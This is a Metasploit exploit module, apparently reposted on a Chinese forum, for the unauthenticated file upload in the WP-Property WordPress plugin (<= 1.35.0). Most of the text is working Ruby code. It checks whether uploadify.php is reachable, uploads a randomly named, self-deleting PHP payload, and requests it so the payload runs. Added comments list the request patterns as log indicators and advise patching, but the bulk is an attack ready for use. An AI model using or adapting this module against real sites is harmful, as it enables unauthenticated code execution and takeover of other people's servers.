WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

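require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (affected versions per the module description: <= 1.35.0).
#
# Traffic generated by this module, as visible in the code below:
#   * check:   one GET to <TARGETURI>/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   * exploit: one multipart POST to the same script with a "Filedata" part
#              (a file named with five random letters plus ".php") and a
#              "folder" part, followed by one GET to whatever path the
#              server returned in the upload response body.
#
# NOTE(review): for defenders, those request shapes are the observable
# indicators in web-server logs. Hosts running the affected versions should
# update the plugin or remove/block the bundled uploadify.php; the fixed
# version is not stated on this page, so confirm it with the vendor.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # The page showed this constant as "Msf::Exploit:hpEXE" (the ":P" was eaten
  # by the forum renderer). The require above and the call to
  # get_write_exec_payload below identify it as the PhpEXE mixin.
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, references, targets) and the single
  # TARGETURI option pointing at the WordPress base path.
  #
  # @param info [Hash] metadata merged into the defaults via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the bundled uploadify.php script.
  #
  # The only signal used is an HTTP 200 on the script path; no plugin version
  # is read. An "Appears" result therefore means the file is reachable, not
  # that the installed version is confirmed vulnerable.
  #
  # @return [Exploit::CheckCode] Unknown when there is no response or a
  #   non-200 status, Appears otherwise
  def check
    base = target_uri.path
    # Build a new string instead of appending in place to the path object.
    base = "#{base}/" unless base.end_with?('/')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads the generated PHP file through uploadify.php and then requests it.
  #
  # Fails with UnexpectedReply when the upload response is missing, is not a
  # 200, or does not echo the uploaded file name.
  def exploit
    base = target_uri.path
    base = "#{base}/" unless base.end_with?('/')

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # presumably :unlink_self makes the uploaded PHP delete itself after it
    # runs, which would leave no file on disk for later triage (confirm
    # against the PhpEXE mixin)
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    # The "folder" field names the uploadify directory under TARGETURI.
    data.add_part("#{base}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a boundary marker at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the path of the follow-up GET.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end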
不要问我这写的是什么 怎么利用 我是说msf.